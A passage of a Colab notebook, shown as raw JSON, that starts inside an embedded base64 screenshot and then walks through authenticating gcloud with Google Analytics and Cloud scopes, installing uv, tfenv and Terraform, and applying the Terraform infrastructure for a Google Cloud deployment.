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ddz6q76q7xmnoqrvEDMBIkAEiAARIAJEgAgQASJABIgAESACRIAIzJ0IxLuq5s6v5FcRASJABIgAEXjlITBYu6mALBVVr7z6xS8mAkSACBABIkAEiAARIAJEgAgQASJABIhANgTed+p97qf3PpstPkZEBIgAESACRIAIDC0Cm629iPvqR9catExQUTVoUDMhIkAEiAARIAJEgAgQASJABIgAESACRIAIzJ0IcGfV3Fmu/CoiQASIABF45SEwmDupFF0qqhQJPokAESACRIAIEAEiQASIABEgAkSACBABIkAEKiPw+OOPuwkTJgT/uLPqilufcrf95jn3p6dedP/5z0Bwo4EIEAEiQASIABEYngiMGTPKLb/EOLfJmgu7t09ZouNOqnis79cXUFHVL2QZLxEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIQCkCVFSVwkNHIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIABEgAkSACBCBfiFARVW/kGW8RIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACpQhQUVUKDx2JABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQAT6hQAVVf1ClvESASJABIgAESACRIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAiUIkBFVSk8dCQCRIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAEegXAlRU9QtZxksEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIABEgAkSACBABIlCKABVVpfDQkQgQASJABIgAESACRIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEoF8IUFHVL2QZLxEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIQCkCVFSVwkNHIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIABEgAkSACBCBfiFARVW/kGW8RIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACpQhQUVUKDx2JABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAESACRIAIEAEiQAT6hQAVVf1ClvESASJABIgAESACRIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAiUIkBFVSk8dCQCRIAIEAEiQASIABEgAkSACBABIkAEiAARIAJEgAgQASJABIgAEegXAlRU9QtZxksEiAARIAJEgAgQASJABIgAESACRIAIEAEiQASIABEgAkSACBABIlCKwP8Bg3oJxuygNj8AAAAASUVORK5CYII=)\n", + "\n", + "***Time: 2 minute.***" + ], + "metadata": { + "id": "mOISt4ShqIbc" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "!gcloud config set disable_prompts false\n", + "!gcloud auth application-default login --quiet --scopes=\"openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth\"\n", + "!gcloud auth application-default set-quota-project {PROJECT_ID}\n", + "!export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "\n", + "clear_output(wait=True)\n", + "print(\"SUCCESS\")" + ], + "metadata": { + "id": "3cAwp6CRLSVf", + "colab": { + "base_uri": 
"https://localhost:8080/" + }, + "outputId": "052b9063-ac72-4eb5-ba91-98662b5dbd0c", + "cellView": "form" + }, + "execution_count": 3, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 4. Prepare environment for Installation\n", + "\n", + "Click the ( β–Ά ) button to prepare the environment for an end-to-end installation.\n", + "\n", + "***Time: 5 minutes.***" + ], + "metadata": { + "id": "WYG5sjFEqX2X" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "# prompt: install packages\n", + "apt-get install python3.11\n", + "CLOUDSDK_PYTHON=python3.11\n", + "\n", + "#prompt: install uv\n", + "curl -LsSf https://astral.sh/uv/install.sh | sh\n", + "\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "uv --version\n", + "\n", + "git clone --depth=1 https://github.com/tfutils/tfenv.git ~/.tfenv\n", + "echo 'export PATH=\"~/.tfenv/bin:$PATH\"' >> ~/.bash_profile\n", + "echo 'export PATH=$PATH:~/.tfenv/bin' >> ~/.bashrc\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "\n", + "mkdir -p ~/.local/bin/\n", + ". ~/.profile\n", + "ln -s ~/.tfenv/bin/* ~/.local/bin\n", + "which tfenv\n", + "tfenv --version\n", + "\n", + "tfenv install 1.9.7\n", + "tfenv use 1.9.7\n", + "terraform --version\n", + "\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PROJECT_ID=$(gcloud config get project --format=json | tr -d '\"')\n", + "source ./scripts/generate-tf-backend.sh" + ], + "metadata": { + "id": "hmdklTTuQ_9d", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "### 5. Run Installation\n", + "\n", + "Click the ( β–Ά ) button to run the installation end-to-end.\n", + "After clicking the button, expand this section to observe that all cells have successfully executed without issues.\n", + "\n", + "***Time: 25-30 minutes.***" + ], + "metadata": { + "id": "US36yJ8lmqnP" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" init" + ], + "metadata": { + "id": "5UIbC_z9bgy4", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.data_store -auto-approve" + ], + 